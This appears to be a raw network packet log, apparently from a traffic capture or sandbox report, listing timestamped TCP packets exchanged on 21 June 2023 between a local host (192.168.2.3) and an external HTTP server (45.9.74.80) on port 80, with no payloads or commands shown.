Jun 21, 2023 04:27:58.391989946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392035007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392041922 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.392081976 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392127037 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392175913 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392185926 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.392220974 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392296076 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.392297983 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392354012 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392359972 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.392396927 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392440081 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392453909 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.392486095 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392534971 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392545938 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.392581940 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392628908 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392643929 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.392674923 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392719984 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392764091 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392770052 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.392810106 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392854929 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392868996 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.392900944 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392946959 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.392973900 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.393007994 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.393011093 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393078089 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393125057 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393131018 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.393171072 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393215895 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393227100 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.393260956 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393305063 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393349886 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393368959 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.393397093 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393443108 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393464088 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.393488884 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393488884 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.393537998 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393583059 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393595934 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.393629074 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393673897 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393690109 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.393722057 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393768072 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393775940 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.393815041 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393861055 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393906116 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393918037 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.393950939 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.393999100 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.394026995 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.394045115 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.394059896 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.394098043 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.394157887 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.394165039 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.394210100 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.394256115 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.394270897 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.394299030 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.394341946 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.394385099 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.394409895 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.397469044 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.398627996 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.421428919 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421467066 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421492100 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421518087 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421542883 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421567917 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421591997 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421617031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421631098 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.421642065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421663046 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.421667099 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421683073 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.421693087 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421717882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421742916 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421749115 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.421772957 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.421777010 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421802044 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421825886 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421834946 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.421850920 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421875954 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421885014 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.421900034 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421925068 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421937943 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.421951056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.421977043 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422004938 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.422027111 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.422101974 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422127008 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422149897 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422182083 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422184944 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.422218084 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422274113 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.422306061 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422331095 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422355890 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422379971 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422398090 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.422405005 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422420025 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.422430992 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422465086 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422487020 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.422498941 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422525883 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422549963 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422565937 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.422574043 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422590017 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.422600031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422624111 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422647953 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422682047 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.422697067 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422722101 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422745943 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422750950 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.422750950 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.422772884 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422797918 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422796965 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.422822952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422875881 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.422907114 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422930956 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422954082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422977924 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.422985077 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.423002958 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423008919 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.423086882 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423111916 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423135996 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423142910 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.423161030 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423163891 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.423186064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423208952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423233032 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423238039 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.423255920 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.423296928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423325062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423347950 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423355103 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.423372984 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423397064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423420906 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423424959 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.423451900 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.423506975 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423542976 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423573017 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423597097 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423609972 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.423621893 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423635960 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.423743010 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423768044 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423791885 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423804998 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.423815966 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423829079 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.423841000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423865080 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423887968 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423890114 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.423918009 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.423934937 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423959970 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.423983097 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.424007893 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.424016953 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.424034119 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.424037933 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.424057961 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.424082994 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.424108028 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.424112082 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.424132109 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.424134970 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.424156904 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.424180984 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.424204111 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.424207926 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.424228907 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.424228907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.424354076 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.424381971 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.424406052 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.424427032 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.424428940 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.424449921 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.424473047 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.425415039 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.425441980 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.425467968 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.425530910 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.449182987 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.449235916 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.449269056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.449302912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.449337006 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.449374914 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.449413061 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.449450970 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.449469090 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.449469090 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.449491978 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.449506044 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.449534893 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.449572086 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.449600935 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.449604988 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.449645042 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.449753046 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.449794054 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.449831963 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.449868917 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.449903965 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.449928045 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.450208902 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.450251102 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.450288057 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.450292110 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.450321913 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.450345993 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.450359106 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.450398922 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.450437069 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.450453043 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.450474024 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.450510025 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.450539112 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.450542927 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.450577974 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.450603008 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.450603962 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.450630903 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.450639963 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.450690031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.450716019 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.450742006 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.450754881 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.450767994 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.450777054 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.450830936 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.450910091 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.450937986 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.451136112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.451162100 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.451186895 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.451203108 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.451212883 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.451226950 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.451240063 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.451266050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.451292038 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.451303005 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.451317072 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.451328039 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.451343060 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.451369047 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.451375961 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.451392889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.451419115 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.451448917 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.451478004 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.451684952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.451913118 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.451940060 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.451965094 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.451989889 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.451993942 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.452017069 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452023029 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.452044964 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452069998 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452075958 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.452244043 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452295065 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452310085 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.452322960 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452348948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452373028 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452383995 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.452399015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452405930 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.452450991 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452476978 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452501059 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452502012 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.452527046 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452538013 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.452553988 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452585936 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.452678919 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452713966 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452747107 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452770948 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.452771902 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452790976 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.452799082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452826023 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452850103 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:58.452851057 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452877998 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452903032 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:58.452928066 CEST	80	49719	45.9.74.80	192.168.2.3
